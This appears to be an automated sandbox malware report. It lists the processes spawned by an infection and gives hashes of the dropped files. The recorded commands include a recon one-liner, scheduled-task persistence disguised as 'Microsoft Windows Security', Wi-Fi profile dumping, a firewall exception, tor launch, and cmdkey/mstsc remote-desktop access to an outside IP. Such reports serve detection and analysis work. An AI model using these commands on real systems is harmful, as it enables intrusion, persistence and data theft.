C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Users\Admin\AppData\Local\Temp\1719112073.exe

C:\Users\Admin\AppData\Local\Temp\1719112073.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

"C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe"

C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe

"C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Users\Admin\AppData\Local\Temp\1205734847.exe

C:\Users\Admin\AppData\Local\Temp\1205734847.exe

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4810.tmp\4811.tmp\4812.bat C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"

C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe

"C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe"

C:\Users\Admin\AppData\Local\Temp\188477111.exe

C:\Users\Admin\AppData\Local\Temp\188477111.exe

C:\Users\Admin\AppData\Roaming\SteamDetector.exe

"C:\Users\Admin\AppData\Roaming\SteamDetector.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe

"C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\dp3s81isgn\tor\torrc.txt"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\2472628288.exe

C:\Users\Admin\AppData\Local\Temp\2472628288.exe

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Users\Admin\AppData\Local\Temp\2009521560.exe

C:\Users\Admin\AppData\Local\Temp\2009521560.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe" -service -lunch

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /delete: 211.168.94.177

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

"C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.log

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"

C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe"

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

"C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Users\Admin\AppData\Local\Temp\Files\build.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

"C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 600

C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe"

C:\Users\Admin\AppData\Local\Temp\Files\key.exe

"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 264

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6396 -s 3656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6904 -ip 6904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6392 -ip 6392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5428 -ip 5428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6904 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 205276

Network

Files

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\aiohttp\_helpers.pyd

MD5 d2bf6ca0df56379f1401efe347229dd2
SHA1 95c6a524a9b64ec112c32475f06a0821ff7e79c9
SHA256 04d56d6aa727665802283b8adf9b873c1dd76dfc7265a12c0f627528ba706040
SHA512 b4a2b9f71b156731aa071d13bf8dcffec4091d8d2fab47aea1ff47cd7abff13e28acf1d9456a97eb7a5723dbfa166fc63de11c63dc5cb63b13b4df9930390377

memory/3080-1297-0x00000204C91B0000-0x00000204C91D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\aiohttp\_http_parser.pyd

MD5 9642c0a5fb72dfe2921df28e31faa219
SHA1 67a963157ee7fc0c30d3807e8635a57750ca0862
SHA256 580a004e93bed99820b1584dffaf0c4caa9fbbf4852ccded3b2b99975299367b
SHA512 f84b7cde87186665a700c3017efcbcc6c19f5dc2c7b426d427dddbcbdec38b6189dd60ce03153fb14b6ea938d65aab99da33bda63b48e3e9ce9e5d3555b50a04

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\aiohttp\_http_writer.pyd

MD5 e16a71fc322a3a718aeaeaef0eeeab76
SHA1 78872d54d016590df87208518e3e6515afce5f41
SHA256 51490359d8079232565187223517eca99e1ce55bc97b93cf966d2a5c1f2e5435
SHA512 a9a7877aa77d000ba2dd7d96cf88a0e9afb6f6decb9530c1d4e840c270dd1805e73401266b1c8e17c1418effb823c1bd91b13f82dbfc6dba455940e3e644de54

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_overlapped.pyd

MD5 7e6bd435c918e7c34336c7434404eedf
SHA1 f3a749ad1d7513ec41066ab143f97fa4d07559e1
SHA256 0606a0c5c4ab46c4a25ded5a2772e672016cac574503681841800f9059af21c4
SHA512 c8bf4b1ec6c8fa09c299a8418ee38cdccb04afa3a3c2e6d92625dbc2de41f81dd0df200fd37fcc41909c2851ac5ca936af632307115b9ac31ec020d9ed63f157

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_asyncio.pyd

MD5 6eb3c9fc8c216cea8981b12fd41fbdcd
SHA1 5f3787051f20514bb9e34f9d537d78c06e7a43e6
SHA256 3b0661ef2264d6566368b677c732ba062ac4688ef40c22476992a0f9536b0010
SHA512 2027707824d0948673443dd54b4f45bc44680c05c3c4a193c7c1803a1030124ad6c8fbe685cc7aaf15668d90c4cd9bfb93de51ea8db4af5abe742c1ef2dcd08b

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\libssl-1_1.dll

MD5 de72697933d7673279fb85fd48d1a4dd
SHA1 085fd4c6fb6d89ffcc9b2741947b74f0766fc383
SHA256 ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f
SHA512 0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\libcrypto-1_1.dll

MD5 ab01c808bed8164133e5279595437d3d
SHA1 0f512756a8db22576ec2e20cf0cafec7786fb12b
SHA256 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55
SHA512 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_ssl.pyd

MD5 35f66ad429cd636bcad858238c596828
SHA1 ad4534a266f77a9cdce7b97818531ce20364cb65
SHA256 58b772b53bfe898513c0eb264ae4fa47ed3d8f256bc8f70202356d20f9ecb6dc
SHA512 1cca8e6c3a21a8b05cc7518bd62c4e3f57937910f2a310e00f13f60f6a94728ef2004a2f4a3d133755139c3a45b252e6db76987b6b78bc8269a21ad5890356ad

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_socket.pyd

MD5 e137df498c120d6ac64ea1281bcab600
SHA1 b515e09868e9023d43991a05c113b2b662183cfe
SHA256 8046bf64e463d5aa38d13525891156131cf997c2e6cdf47527bc352f00f5c90a
SHA512 cc2772d282b81873aa7c5cba5939d232cceb6be0908b211edb18c25a17cbdb5072f102c0d6b7bc9b6b2f1f787b56ab1bc9be731bb9e98885c17e26a09c2beb90

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_cffi_backend.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\python3.dll

MD5 07bd9f1e651ad2409fd0b7d706be6071
SHA1 dfeb2221527474a681d6d8b16a5c378847c59d33
SHA256 5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5
SHA512 def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\sqlite3.dll

MD5 926dc90bd9faf4efe1700564aa2a1700
SHA1 763e5af4be07444395c2ab11550c70ee59284e6d
SHA256 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0
SHA512 a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_sqlite3.pyd

MD5 7f61eacbbba2ecf6bf4acf498fa52ce1
SHA1 3174913f971d031929c310b5e51872597d613606
SHA256 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e
SHA512 a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_lzma.pyd

MD5 b5fbc034ad7c70a2ad1eb34d08b36cf8
SHA1 4efe3f21be36095673d949cceac928e11522b29c
SHA256 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6
SHA512 e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_bz2.pyd

MD5 a4b636201605067b676cc43784ae5570
SHA1 e9f49d0fc75f25743d04ce23c496eb5f89e72a9a
SHA256 f178e29921c04fb68cc08b1e5d1181e5df8ce1de38a968778e27990f4a69973c
SHA512 02096bc36c7a9ecfa1712fe738b5ef8b78c6964e0e363136166657c153727b870a6a44c1e1ec9b81289d1aa0af9c85f1a37b95b667103edc2d3916280b6a9488

C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\_ctypes.pyd

MD5 87596db63925dbfe4d5f0f36394d7ab0
SHA1 ad1dd48bbc078fe0a2354c28cb33f92a7e64907e
SHA256 92d7954d9099762d81c1ae2836c11b6ba58c1883fde8eeefe387cc93f2f6afb4
SHA512 e6d63e6fe1c3bd79f1e39cb09b6f56589f0ee80fd4f4638002fe026752bfa65457982adbef13150fa2f36e68771262d9378971023e07a75d710026ed37e83d7b

memory/536-1300-0x0000000005B80000-0x0000000005BD4000-memory.dmp

memory/5976-1311-0x000000006FA70000-0x000000006FABC000-memory.dmp

memory/5976-1323-0x0000000006230000-0x000000000624E000-memory.dmp

memory/1684-1326-0x0000000004C00000-0x0000000004CD4000-memory.dmp

memory/5976-1324-0x0000000006C80000-0x0000000006D23000-memory.dmp

memory/536-1380-0x0000000000400000-0x000000000184E000-memory.dmp

memory/5976-1310-0x0000000006C40000-0x0000000006C72000-memory.dmp

memory/5976-1479-0x0000000006F90000-0x0000000006FAA000-memory.dmp

memory/5976-1478-0x00000000075D0000-0x0000000007C4A000-memory.dmp

memory/1684-1314-0x0000000000760000-0x0000000000804000-memory.dmp

memory/5976-2208-0x00000000049F0000-0x00000000049FA000-memory.dmp

memory/5976-2768-0x0000000007220000-0x00000000072B6000-memory.dmp

memory/5976-3569-0x00000000071C0000-0x00000000071D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe

MD5 3965af8553f2dd6467b7877f13ec3b2e
SHA1 ed0ab005fde56a8227fbeac7f62db45e1060bf42
SHA256 604dc2088913709520dbde3830c37c44c9cf9dd1ddd493a1ea71a710c3650015
SHA512 9dcd4ec201385c6a41187cf2621ddd1b7b354746ade88c4a74bf3c6d7ec63a170e3add8b56ef324ae770f60d83c1fdab9a3f1f98c1bcfb7a276f9cc65f18aea9

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

memory/1684-5221-0x0000000004DE0000-0x0000000004E36000-memory.dmp

memory/5976-5225-0x00000000071F0000-0x00000000071FE000-memory.dmp

memory/5976-5230-0x0000000007200000-0x0000000007214000-memory.dmp

memory/5976-5232-0x00000000072E0000-0x00000000072FA000-memory.dmp

memory/5976-5234-0x00000000072D0000-0x00000000072D8000-memory.dmp

memory/5556-5262-0x0000000000460000-0x0000000000466000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe

MD5 304a5a222857d412cdd4effbb1ec170e
SHA1 34924c42524ca8e7fcc1fc604626d9c5f277dba2
SHA256 d67fb52973c445a3488a9d6a9a9ff3ebebb05b1c0e853cebfa8bba1a5953f0d6
SHA512 208b39436b520e909eb8262f68314dcb93852ea5f00a1d4ce8bd682dd5e20ad313e65ff293c8062bfed95ffe101f6ead3d7da4886e779031101329a3764b855f

C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe

MD5 c7bb7b93bc4327b0190c852138cc4f0c
SHA1 af779bc979d9d4515510b60511ef14d1d3331f47
SHA256 bcb6f8e7702380c8f2eec6393a4a4d414027d75786593072e524aef7f4d232cd
SHA512 56a4fe9007421e2a0a0afbfc12d1b3fa8544ff71986282292608966725e2a436b751fc4aa7a7bb99a0dfe50aada7419c4450d01dd94ac78251ab8ce33d432d55

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

MD5 c2bc344f6dde0573ea9acdfb6698bf4c
SHA1 d6ae7dc2462c8c35c4a074b0a62f07cfef873c77
SHA256 a736269f5f3a9f2e11dd776e352e1801bc28bb699e47876784b8ef761e0062db
SHA512 d60cf86c0267cd4e88d21768665bbb43f3048dace1e0013b2361c5bfabf2656ff6215dfb75b6932e09545473305b4f707c069721cdde317b1df1709cd9fc61c0

C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

MD5 a474faa2f1046fbab4c3ad1e3a26097e
SHA1 aa526b2583dd9b72dd4ae2549189c6631f8486c2
SHA256 391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b
SHA512 947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b

C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe

MD5 6782ce61039f27f01fb614d3069c7cd0
SHA1 6870c4d274654f7a6d0971579b50dd9dedaa18ad
SHA256 11798c5a66618d32e2666009fb1f4569ae8b2744fa0278f915f5c1eefb1fd98d
SHA512 90fc316784eba2e553c2658ac348e6fcb4ab6987209d51e83c1d39d7a784ca0f18729349904bac6d92d3b163ce9f0270369a38eac8c9541ae211d74bce794938

memory/6396-5413-0x000002098EC40000-0x000002098ED08000-memory.dmp

C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe

MD5 07244a2c002ffdf1986b454429eace0b
SHA1 d7cd121caac2f5989aa68a052f638f82d4566328
SHA256 e9522e6912a0124c0a8c9ff9bb3712b474971376a4eb4ca614bb1664a2b4abcf
SHA512 4a09db85202723a73703c5926921fef60c3dddae21528a01936987306c5e7937463f94a2f4a922811de1f76621def2a8a597a8b38a719dd24e6ff3d4e07492ca

C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe

MD5 121e1634bf18768802427f0a13f039a9
SHA1 8868654ba10fb4c9a7bd882d1f947f4fd51e988e
SHA256 5fc600351bade74c2791fc526bca6bb606355cc65e5253f7f791254db58ee7fa
SHA512 393df326af3109fe701b579b73f42f7a9b155bb4df6ea7049ad3ae9fdd03446576b887a99eb7a0d59949a7a63367e223253448b6f1a0ebeaf358fa2873dcc200

C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe

MD5 915e73432043f7666919cda54815bf6f
SHA1 8c4f0faf612938ef9a3513aa48a5f8cec8ce1289
SHA256 2275d323b2591aba2d76160cf4f6b12f5f3018da7fa64978ada989dfb127a2b8
SHA512 67d9fcddfed41cd1f547d0e9a8a6a5cd46d37c370ae22a3a9d501623c6398b9352fa0493af9d29358a74049f7f2c28501231719b4025624abe8d003a85a402a5

C:\Users\Admin\AppData\Local\Temp\Files\shopfree.exe

MD5 a3881dfafe2384ee33c8afb5eeda3321
SHA1 7e212f0a0b97de88ed97976cd57f18e13a3ff8b6
SHA256 d76391b6dca2b5057a0adfb446cf6f80e9be5ec4241cfeddff6e1ca03b331a72
SHA512 4941b98b27b024e94cb83b804ac184bd6c35b1aefab0351dc9f173bc3510910a05b16949e5b9610c72a622740cb5dc46840a2924db7a994046c982430865b037

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

MD5 b9ada94355eb4620796420f457edcaa1
SHA1 2913a116f9fea713045de4a59ae55d1fe4c407ec
SHA256 a6f32d15c2d83286fe4de90337c90c8a3844d838aa9baad34fa76f492b5782cb
SHA512 f241ce9603b2d7f8434d16beb607cef2b42cc6260813d7f1fa41ade3e9e421bd3ecde2bb22277daefefd970afef84c723c1d9f299f8bd5668de35b2acd6db33e

C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe

MD5 795197155ca03f53eed7d90a2613d2a7
SHA1 e177b0c729b18f21473df6decd20076a536e4e05
SHA256 9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
SHA512 4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b

C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe

MD5 3ace4cb9af0f0a2788212b3ec9dd4a4e
SHA1 2914bd74b5553f5f4dbd5f7b23bc00d04a2c77cb
SHA256 121bfcb759e561bca3f63777498646c80d030a92dac5a27c7c9cc8f5581e672e
SHA512 76ecc354b1fb5bf93f18bbe9f85401ef40e0826f7eea73a0cb5afda5d69ec384a459c07b6cc2386176888978d2dbb9bac9360e249114c59799de0984bbba5c56

C:\Users\Admin\AppData\Local\Temp\Files\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de